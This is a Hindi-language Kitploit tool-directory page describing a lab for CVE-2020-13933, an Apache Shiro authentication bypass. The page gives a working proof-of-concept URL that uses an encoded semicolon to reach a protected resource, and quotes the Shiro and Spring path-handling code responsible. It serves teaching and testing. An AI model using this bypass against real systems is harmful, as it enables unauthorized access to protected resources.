Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-13933 — CVE-2020-13933 रेंज: shiro प्रमाणीकरण बाइपास भेद्यता | Kitploit
उपकरण/GitHubGitHub/exp-docs/cve-2020-13933
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubexp-docs/cve-2020-13933

CVE-2020-13933

CVE-2020-13933 रेंज: shiro प्रमाणीकरण बाइपास भेद्यता

रिपॉजिटरी देखें
14443 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2020-13933 प्रयोगशाला

shiro < 1.6.0 प्रमाणीकरण बाईपास भेद्यता


PoC

http://127.0.0.1:8080/res/%3bpoc

प्रयोगशाला वातावरण

कोड विवरण

  • ShiroConfig.java:
      अनुमति कॉन्फ़िगरेशन, जब /res/* संसाधन का अनुरोध किया जाता है, तो 302 लॉगिन पृष्ठ पर प्रमाणीकरण के लिए रीडायरेक्ट होता है
  • NameController.java:
      · /res/{name}: name नामक संसाधन का अनुरोध (प्रमाणीकरण ट्रिगर करता है)
      · /res/: किसी संसाधन का अनुरोध नहीं करता (प्रमाणीकरण ट्रिगर नहीं करता)

प्रयोगशाला सत्यापन

जब अनुरोध पथ में कोई संसाधन नाम निर्दिष्ट नहीं किया जाता है, तो प्रमाणीकरण ट्रिगर नहीं होता है और कोई संसाधन वापस नहीं किया जाता है: http://127.0.0.1:8080/res/

जब अनुरोध पथ में संसाधन नाम निर्दिष्ट किया जाता है, तो 302 प्रमाणीकरण पृष्ठ पर रीडायरेक्ट होता है: http://127.0.0.1:8080/res/poc

जब एक विशिष्ट PoC अनुरोध किसी निर्दिष्ट संसाधन के लिए बनाया जाता है, तो प्रमाणीकरण ट्रिगर नहीं होता है और संसाधन वापस किया जाता है: http://127.0.0.1:8080/res/%3bpoc (%3b ; का URL एनकोडिंग है)

भेद्यता DEBUG स्थान

shiro-web-1.5.3.jar

root@kitploit:~
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}

spring-web-5.2.5.RELEASE.jar

root@kitploit:~
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
टूल डाउनलोड करें